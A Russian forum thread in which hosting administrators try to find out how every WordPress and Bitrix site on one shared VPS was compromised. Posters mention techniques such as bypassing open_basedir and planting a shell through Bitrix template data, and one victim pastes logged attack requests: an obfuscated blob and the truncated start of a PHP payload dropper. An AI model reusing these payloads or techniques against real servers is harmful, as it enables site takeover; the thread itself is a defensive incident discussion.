Помогите найти проблему - взломали все сайты на одном сервере под разными юзерами

Так изначально и стоит mpm_itk

вот не понимаю, смысл гнать на firstvds, если они предоставляют изначально голую VPS с установленной выбранной OS?

смотреть лог ssh\ftp post запросы к сайтам - там все ответы.

Если не настроить правильно веб-сервер, то эти телодвижения тщетны. Имея троян или уязвимость в одном сайте, можно взломать все..

А что это дает?

скорее всего зловредные файлы создает не один из созданных пользователей, а апач (www-data)

Для того, чтобы что-то дало разделение - нужно еще выставить права на папки с сайтом хотя бы 0755

чего гадать-то, покажите какие именно права на файлы и диры

и как организовано разделение прав веб-сервера

проблема 99% в этом

злоумышленник с взломанного пользователя через proc_open или типа того в обход open_basedir смотрит доступ к базе данных другого пользователя, меняет пароль админа, заходит в админку и заливает шелл

в битриксе и ряде других cms можно шелл прямо в базу засунуть

ну или тупо находит диру 777 и туда заливается

При включённой проактивной защите ?

suffix, при включенном чем угодно :)

если мне память не изменяет, таблица site_templates содержит исполняемое условие для подключения шаблона

php-код, куда можно добавить любой свой

То же самое: firstvds + centos. Куча сайтов на WP - каждый под своим пользователем. Все поломаны - в корне xml.php и куча зашифрованных php скриптов по папкам. Файлы зловредов создаются от пользователя apache. Задолбался вычищать уже. Несмотря на принятые заранее меры: чистый свежий WP, отключенный ftp, дополнительную авторизацию на файлы wp-login.php (через апач), удалённый xmlrpc.php...

Есть подозрение, что заливается каким-то (каким???) образом файл в mod-tmp (следы есть) и оттуда уже ползёт зараза дальше. Проверьте у кого такой же взлом.

При этом - есть пользователи, под которыми крутятся сайты без CMS, ну или на самописе - там чисто. Есть юзеры с файлами wp, но дропнутыми доменами, т.е. условно недоступными снаружи - тоже чисто.

Из чего делаю вывод - что ломают конкретно WP. Извне.

Разобрался кто с источником заразы?

---------- Добавлено 10.01.2018 в 16:59 ----------

Спасибо, почистил - искать по нику "Service"

Но вопрос открыт - где дырка?

В "бесплатных" темах и плагинах с помоек.

Или с даже некогда установленных с репо, но после удалённых по причина найденных там уязвимостей. Те использование древних версий

Это было бы слишком просто. Не мой случай. Ломают даже голую "twentytwelve" на голом свежеобновлённом WP. За пару часов. Включил логирование POST запросов - шлётся некая белиберда к index.php вот такого вида:

xqrs=>f39zfWFnLXtvMiZkcC98ciNlOjMgNHpsdGUjLTkuN3svdn1oeHFyc3hxcnN4cXJzeHFyc3hxcnN4cXJzeHFyc3hxcnN4cXJzPH4zfSsuNS53KzR8eGl3dyl9fXh9b2E6KyErKH5xbGNMCBcVWwoMZTM9HTFfMGdmazgjJXApOjk5FwgOEQINCjk5ZGNALmVjJU89TRB9cWJ0dCIgIjIjJzFlG1hJAgMKARUbGUhQFABOARMFTGdpbhBvHWp1MGciLjovLXxvfVVSFQUdGggQH0RGARFdEgYeURdiazo2OGh8K007QVZiM3g+M356Ix84JysnZiY1ZhFYeTArVgQLBH1/XQkEew0FHAZ3IXQJb3BMfjUXBgEOCCpDcgpfEi0rLw90FF8lTh0AQjMNGixxAHAVNXAqDXQNC3YbEU5HMBFLCi9AfXcVdVRSLiEPRwkwERsTLFMAEWNOKSgXGhEqHElSdDFTNygAXRQrDVBcfw8BWCsBGBsLelIDBiRVBHAmAQMpPFBvATtSOhY6UTIvLBBFTyIgRHQMBQkSc3YLC3ouCQMtewkWJWlYECosCxM5VQYRLFBXRiE+RgEcfT8CICAKG2JQDQUUGBIXA2JbdCV2Dj0LJw85JC1XcCEfGiN0IywkBEwoO1lRdhoNJQwBF3BfBxBwdwQtdQ8hEEN7XQwHRyIoCm8WFyg9O1lRNBoJeigIAVVnES90CRMcdh8SACpkXBs6WgQXIBZMAEgrNnJ2ESg/NDQJBUp+DgJNLCsoVgssJk1NeAATQhAjJR11CU0OZkFPBjAdKSwIBUhHLxAtJC0cZHUvJSlefAEWQi0nehZyEFx2BhtMEhIqGT4QE017NDZScXc6UhYSc0hRb38Hey8sAA8TOlcTBiZYIDAyLA8MKlhyLwtfESwAVAISA0wmWRIFR34/ER8hKEB1K0J+AigQRBAEKl53EjJ3FgEQKCYEI35fQX4+QR8uPgh1CVcSC2JQBBE1JRYuEElEEAgvEnUHLQgDcyNNJSIsWwQUIA13J3MRJnosBCcxJREEHC0fJwV/MhceW3IDIGotVC0+WiQrHWwiG1MyFlJJBBYICAUPLH9dHTt/Nwg9cQ4mFnVfTngteCR1BjsVKVQ9OlZVLhVuJikmHkJeBxBwd00JeSoKJClGfy4SfC0PAx53GnQ/L0hiBS06GXIoIlx5MiN1AhQHcBcFESpzeAATUh0keBYFFFwSL1J8N3cdKSwIDFN9MQ5JeR8bSnQ4TUlucxwweSAvGTd/FXguK1JWdBYWGwIuLX8nLHN5FREbf3QVNU9AJ3MceSxxCDstCVoWM2hBHxJvLSp2IVFdLDRTFX4STxYnLE9SezxfcywMEg4VKC4EOGEiBCcxBAQTLVFWFS1mJAAMLiQXCn13Xxw8cgAqIRUBGSglMl8rJhdnOw4HEFl0EQtxGhEcag4DFVNHQHsiQnUtf1YIFUMPEVJwDAMPJQ0BHmheBxB3CgQbdS4WLXZScww2ZxItGRQUcFs+D0J8Mw0kKXcMPFJnChVJcgkeRzcNPX0nWR4UYAgxJBYFEnINVVJKLCsNfQ10HE9PDBFPJHUFRgcXCU1weAAvYwwFGA52DlwzJ1wpdzc6Gh0rF3VYfSJJM3QcRiovDnFORxwCfzUXIRJ3ESgFFUtTIy9UKikuAE5SMBdXcQJzThYJN1VjeAAWQSs/EQQUcnoqa3ZRDxEpHXQHPHlBBnBSLQ0JfTwnLElRez42VSM2BBgQFEs9DmFUMDBnDSAtDBFWFSpWAxYmZCEHASp1QAcycw8QIj4BL3MOGEsqJS0QfiYVf25cDBN3Fh8mLSQsAVBfVBgkRRAuOQ90JyoVG0NqChU1PgQsNVBfARQuSh0gRA0hPVxndSEPRCIseiQVOX0ROnh8LhI1dxEjL29WCXJKCBIPci4kdXImch8DQSZ3Hi4TFyl+FnhwcAM5JQ0hK00lIBlWNQ4JTANKCXdNJRhnYz8kDGkBFiooMFtcNxI/

Или вот такая:

a=>RC
p1=>if(!defined("PHP_EOL"))
{
    define("PHP_EOL", "\n");
}

if(!defined("DIRECTORY_SEPARATOR"))
{
    define("DIRECTORY_SEPARATOR", "/");
}

$payload_file = "PD9
далее обсфукция

Вероятно (не факт, т.к. время создания файла меняется) именно после этого в корне сайта появляется зловред - бэкдор, к которому идут уже другие пост запросы и закладки рассовываются по файлам. В общем уязвимость где-то на стыке апача (т.к. обнаружились незатёртые файлы сессий в папке php-tmp c <php echo "test"; ?> внутри) и WP. Пока не выяснил где именно.

У меня другая мысль появилась - ну это же идеальный хонейпот. Я отловил всего около 15 ip адресов, с которых идёт управление бэкдорами на моих сайтах. IP сейчас не дешевые, неужели никто централизованно/промышленно не борется с ботнетами отправляя их ип в бан? CloudFlare как оказалось пропускает их, зато мой динамический ип билайна всегда выхватывает их капчу.